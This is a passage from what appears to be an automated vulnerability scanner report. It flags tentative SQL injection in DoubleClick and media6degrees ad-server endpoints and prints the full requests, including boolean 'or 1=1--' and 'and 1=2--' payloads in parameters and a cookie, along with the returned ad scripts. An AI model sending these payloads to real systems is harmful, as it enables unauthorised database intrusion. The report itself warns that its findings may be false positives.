ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/o%3B240620426%3B0-0%3B0%3B63480066%3B2321-160/600%3B41961063/41978850/1%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='"'
...[SNIP]...

Request 2

GET /adj/N6715.274177.WEBMD.COM/B5443050.15;sz=160x600;ord=btINbge,bgNvkRnyikao?&110652684%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 16:06:08 GMT
Content-Length: 5241

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 18:45:00 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3167159/baseball-160x600_v04k-centered.swf";
var gif = "http://s0.2mdn.net/3167159/baseball160x600END.gif";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/f%3B240620426%3B2-0%3B0%3B63480066%3B2321-160/600%3B41962628/41980415/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/f%3B240620426%3B2-0%3B0%3B63480066%3B2321-160/600%3B41962628/41980415/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma.aspx");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/f%3B240620426%3B2-0%3B0%3B63480066%3B2321-160/600%3B41962628/41980415/1%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='"';
var bgo=(bg=="")?"":'
...[SNIP]...

1.10. http://ad.doubleclick.net/adj/N6715.274177.WEBMD.COM/B5443050.15 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/N6715.274177.WEBMD.COM/B5443050.15

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads 20368142'%20or%201%3d1--%20 and 20368142'%20or%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/N6715.274177.WEBMD.COM/B5443050.15;sz=160x600;ord=btINbge,bgNvkRnyikao?20368142'%20or%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 16:04:54 GMT
Content-Length: 5271

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 17:39:59 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3167159/baseball-160x600_v04k-centered.swf";
var gif = "http://s0.2mdn.net/3167159/baseball160x600END.gif";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/n%3B240620426%3B1-0%3B0%3B63480066%3B2321-160/600%3B41961067/41978854/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma-treatment.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/n%3B240620426%3B1-0%3B0%3B63480066%3B2321-160/600%3B41961067/41978854/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma-treatment.aspx");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/n%3B240620426%3B1-0%3B0%3B63480066%3B2321-160/600%3B41961067/41978854/1%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='"';
v
...[SNIP]...

Request 2

GET /adj/N6715.274177.WEBMD.COM/B5443050.15;sz=160x600;ord=btINbge,bgNvkRnyikao?20368142'%20or%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://as.webmd.com/html.ng/transactionID=3844899260203&tile=3844899260203&xpg=4294&sec=8000&artid=446&site=2&affiliate=22&uri=subject%3Dpink_eye&pos=113
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Wed, 11 May 2011 16:04:55 GMT
Content-Length: 5247

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Fri Apr 29 19:10:04 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/879366/flashwrite_1_2.js\"><\/script>');document.write('\r\n');

function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/3167159/basketball-160x600_v04k-centered.swf";
var gif = "http://s0.2mdn.net/3167159/Basketball160x600END.gif";
var minV = 10;
var FWH = ' width="160" height="600" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/c%3B240620426%3B3-0%3B0%3B63480066%3B2321-160/600%3B41963206/41980993/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma.aspx");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 0;
var winH = 0;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();


var defaultCtVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/c%3B240620426%3B3-0%3B0%3B63480066%3B2321-160/600%3B41963206/41980993/1%3B%3B%7Esscs%3D%3fhttp://www.nationaljewish.org/treatment/asthma.aspx");
var ctp=new Array();
var ctv=new Array();
ctp[0] = "clickTAG";
ctv[0] = "";


var fv='"moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(var ctIndex = 0; ctIndex < ctp.length; ctIndex++) {
var ctParam = ctp[ctIndex];
var ctVal = ctv[ctIndex];
if(ctVal != null && typeof(ctVal) == 'string') {
if(ctVal == "") {
ctVal = defaultCtVal;
}
else {
ctVal = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3b04/3/0/%2a/c%3B240620426%3B3-0%3B0%3B63480066%3B2321-160/600%3B41963206/41980993/1%3B%3B%7Esscs%3D%3f" + ctVal);
}
if(ctParam.toLowerCase() == "clicktag") {
fscUrl = ctVal;
fscUrlClickTagFound = true;
}
else if(!fscUrlClickTagFound) {
fscUrl = ctVal;
}
fv += "&" + ctParam + "=" + ctVal;
}
}
fv+='"';
var bgo=(bg=="")?
...[SNIP]...

1.11. http://ad.doubleclick.net/adj/trb.zap2it/ntl/people [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/trb.zap2it/ntl/people

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adj/trb.zap2it/ntl/people;sz=300x250;pos=2;usr=u;rs=10011;rs=10030;rs=10070;rs=70008;rs=70010;rs=70118;rs=70613;rs=72078;ord=1351509551?&1%20and%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Date: Wed, 11 May 2011 15:57:09 GMT
Content-Length: 4688

var divid='dclkAdsDivID_22382';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_22382 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\">
...[SNIP]...
<script>vu(\"http://adx.g.doubleclick.net/pagead/adview?ai\\x3dBVLJ51LHKTcrHLJmt6Ab2us2fDZXBq-QB1eKHshaF1Y-XEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03MTMxOTkwMzIzNzE4NTE5sgERcGVvcGxlLnphcDJpdC5jb226AQozMDB4MjUwX2FzyAEJ2gE3aHR0cDovL3Blb3BsZS56YXAyaXQuY29tL3Avb3dlbi13aWxzb24vNzQ2ODI_YWlkPXphcDJpdJgC7grAAgTIAu-b5QmoAwHoA7gB6AMi6APHCPUDAAAARA\\x26sigh\\x3d2Apx3dEaN5w\")</script> <a id=\"hal_livingSocial_adX_baseline_E\" href=\"http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&geo=true&ref=socialmedia_hal_livingSocial_adX_F_backup\" target=\"_blank\"><img style=\"border:none\" src=\"http://static.socialmedia.com/ads/LivingSocial/RSS/backup/image.jpg\"/></a><div id=\"hal_livingSocial_adX_baseline_E-parent\"></div><img src=\"http://api.socialmedia.com/services/stats/v1/buckets/groups/entities/hal_livingSocial_adX_baseline_E/events/request.gif\" style=\"position: absolute; left: -16384px\" /><script>(function (){\n \n var clickTag=\'http://googleads.g.doubleclick.net/aclk?sa=l&ai=BVLJ51LHKTcrHLJmt6Ab2us2fDZXBq-QB1eKHshaF1Y-XEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03MTMxOTkwMzIzNzE4NTE5sgERcGVvcGxlLnphcDJpdC5jb226AQozMDB4MjUwX2FzyAEJ2gE3aHR0cDovL3Blb3BsZS56YXAyaXQuY29tL3Avb3dlbi13aWxzb24vNzQ2ODI_YWlkPXphcDJpdJgC7grAAgTIAu-b5QmoAwHoA7gB6AMi6APHCPUDAAAARA&num=1&sig=AGiWqtygYZq9H1ISPlbi1G6aLlzmGjznpA&client=ca-pub-7131990323718519&adurl=\';\n \n var SocialMediaAds=[{\"groupId\":\"hal_livingSocial_adX_baseline_E\",\"adServerUrl\":\"http://api.socialmedia.com//services/adserver/v2\",\"width\":\"300\",\"height\":\"250\",\"clickthroughUrl\":\"http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&geo=true&ref=socialmedia_hal_livingSocial_adX_F_backup\",\"adDisplayServerVersion\":\"v2/ad-display-server.js.gz\",\"backupImageUrl\":\"http://static.socialmedia.com/ads/LivingSocial/RSS/backup/image.jpg\",\"advertiserId\":\"livingSocial\",\"publisherId\":\"adX\",\"campaignId\":\"livingSocialCampaign\",\"clickTag\":\"\" + clickTag + \"\",\"adEmbedTime\":(+new Date).toString()}];\n for (var i=0,l=Soci
...[SNIP]...

Request 2

GET /adj/trb.zap2it/ntl/people;sz=300x250;pos=2;usr=u;rs=10011;rs=10030;rs=10070;rs=70008;rs=70010;rs=70118;rs=70613;rs=72078;ord=1351509551?&1%20and%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://people.zap2it.com/p/owen-wilson/74682?aid=zap2it
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript; charset=UTF-8
Date: Wed, 11 May 2011 15:57:10 GMT
Content-Length: 4661

var divid='dclkAdsDivID_2530';
document.write('<div id=' + divid + '></div>');
var adsenseHtml_2530 = "<html><head></head><body leftMargin=\"0\" topMargin=\"0\" marginwidth=\"0\" marginheight=\"0\"><s
...[SNIP]...
<script>vu(\"http://adx.g.doubleclick.net/pagead/adview?ai\\x3dBjfbI1rHKTe71B8Gk6Ab557DtDJXBq-QB1eKHshaF1Y-XEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03MTMxOTkwMzIzNzE4NTE5sgERcGVvcGxlLnphcDJpdC5jb226AQozMDB4MjUwX2FzyAEJ2gE3aHR0cDovL3Blb3BsZS56YXAyaXQuY29tL3Avb3dlbi13aWxzb24vNzQ2ODI_YWlkPXphcDJpdJgC7grAAgTIAu-b5QmoAwHoA7gB6AMi6APHCPUDAAAARA\\x26sigh\\x3dgN1C0XIr06E\")</script> <a id=\"hal_livingSocial_adX_baseline_E\" href=\"http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&geo=true&ref=socialmedia_hal_livingSocial_adX_F_backup\" target=\"_blank\"><img style=\"border:none\" src=\"http://static.socialmedia.com/ads/LivingSocial/RSS/backup/image.jpg\"/></a><div id=\"hal_livingSocial_adX_baseline_E-parent\"></div><img src=\"http://api.socialmedia.com/services/stats/v1/buckets/groups/entities/hal_livingSocial_adX_baseline_E/events/request.gif\" style=\"position: absolute; left: -16384px\" /><script>(function (){\n \n var clickTag=\'http://googleads.g.doubleclick.net/aclk?sa=l&ai=BjfbI1rHKTe71B8Gk6Ab557DtDJXBq-QB1eKHshaF1Y-XEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi03MTMxOTkwMzIzNzE4NTE5sgERcGVvcGxlLnphcDJpdC5jb226AQozMDB4MjUwX2FzyAEJ2gE3aHR0cDovL3Blb3BsZS56YXAyaXQuY29tL3Avb3dlbi13aWxzb24vNzQ2ODI_YWlkPXphcDJpdJgC7grAAgTIAu-b5QmoAwHoA7gB6AMi6APHCPUDAAAARA&num=1&sig=AGiWqtzKZVNKOXHX9H19sLJ2AIhEkZTdTw&client=ca-pub-7131990323718519&adurl=\';\n \n var SocialMediaAds=[{\"groupId\":\"hal_livingSocial_adX_baseline_E\",\"adServerUrl\":\"http://api.socialmedia.com//services/adserver/v2\",\"width\":\"300\",\"height\":\"250\",\"clickthroughUrl\":\"http://livingsocial.com/deals/socialads_reflector?do_not_redirect=1&geo=true&ref=socialmedia_hal_livingSocial_adX_F_backup\",\"adDisplayServerVersion\":\"v2/ad-display-server.js.gz\",\"backupImageUrl\":\"http://static.socialmedia.com/ads/LivingSocial/RSS/backup/image.jpg\",\"advertiserId\":\"livingSocial\",\"publisherId\":\"adX\",\"campaignId\":\"livingSocialCampaign\",\"clickTag\":\"\" + clickTag + \"\",\"adEmbedTime\":(+new Date).toString()}];\n for (var i=0,l=Soci
...[SNIP]...

1.12. http://cspix.media6degrees.com/orbserv/hbpix [acs cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The acs cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the acs cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8'%20and%201%3d1--%20; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a; rdrlst=4320pahlkze3o0000000i3n07144qlkze3o0000000i3n07157olkxlm50000000q3n0713y7lkze3o0000000i3n0715sklkkpqq000000133n070hsnlkze3o0000000i3n0712nslkxrxz0000000k3n0712gdlkkyy00000000z3n070morlkkxrb000000103n0714k6lkxlm50000000q3n070w35lkze3o0000000i3n0713pylkze3o0000000i3n0714rwlkxlm50000000q3n071628lkze3y0000000g3n07132dlkzsmp000000093n0714khlkxlm50000000q3n071196lkkkbe000000193n0713x4lkxrxz0000000k3n0713qmlkze3y0000000g3n071195lkkpqh000000143n071194lkkjj40000001a3n0716nulkxlm50000000q3n0713q8lkze3y0000000g3n071193lkkplo000000163n070p46lkkpqq000000133n071192lkkpke000000183n070zg4lkze3y0000000g3n0713qwlkze4r0000000f3n07144elkze3o0000000i3n0710poljyxb40000001l3n070e6llkl0r50000000w3n07106llkzt2k000000083n07138olkxrxz0000000k3n0716dnlkze3o0000000i3n0716y4ll1dpj000000033n03167ulkxq410000000l3n0714qllkxlm50000000q3n07159olk8fax0000001g3n0715halkxlm50000000q3n070m0plkkxrb000000103n0716e6lkxnbq0000000p3n0713zblkze3y0000000g3n0714xnlkxlm50000000q3n0716dxlkze3o0000000i3n071391lkxrxz0000000k3n071672lkkxrb000000103n0715zhlkze3y0000000g3n070ycrlkncow0000000u3n070okclkze3o0000000i3n07158mlkze3o0000000i3n071015lkze3y0000000g3n0713lelkxrxz0000000k3n0713yolkze3o0000000i3n070ojulkze3o0000000i3n071240lkxrxz0000000k3n0714ozlkxlm50000000q3n0714bmlkxrxz0000000k3n071590lkzsm20000000a3n0714j7lkxlm50000000q3n0714bzlkxlm50000000q3n0711pjlkxrxz0000000k3n070p01lkze3o0000000i3n0715holkxlm50000000q3n070m7alkkxrb000000103n0713mklkxrxz0000000k3n07101ulkze3o0000000i3n0712zglkxrxz0000000k3n0713lxlkxrxz0000000k3n070zp4lkze3o0000000i3n07148ilkxlm50000000q3n070xvclkze3o0000000i3n0716sjll1dpj000000033n0312yxlkxrxz0000000k3n0715iglkxq0l0000000m3n0713n7lkze3y0000000g3n0716s2lkxpyu0000000n3n0714hplkxlm50000000q3n070znmlk34620000001j3n0714hclkxlm50000000q3n070wd7lkze3o0000000i3n07102plkxrxz0000000k3n0710tylkkpku000000173n070p1alkze3o0000000i3n0700bvlk9pe80000001f3n0715xylk60qe0000001i3n0710lxlkxrxz0000000k3n07103blkxrxz0000000k3n0710telkd7nq0000001d3n0716rslkxppm0000000o3n070c9slk9pe80000001f3n0713mxlkze3o0000000i3n0712emlkze3o0000000i3n0710rdlkdkly0000001b3n070z9zlkze3y0000000g3n07163plkxlm50000000q3n070z9xlkze3o0000000i3n070m40lkkxrb000000103n070zqylkxrxz0000000k3n070mjelkkxrb000000103n0712qnlkkplt000000153n0712x6lkxrxz0000000k3n0714e9lkze3o0000000i3n071342lkze3y0000000g3n0716aulkze3o0000000i3n0716atlkxlm50000000q3n071203lkb5u20000001e3n07163clkxlm50000000q3n070afqlkze3o0000000i3n070o0vlkkpqx000000123n070z2ilkkxrb000000103n07; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; 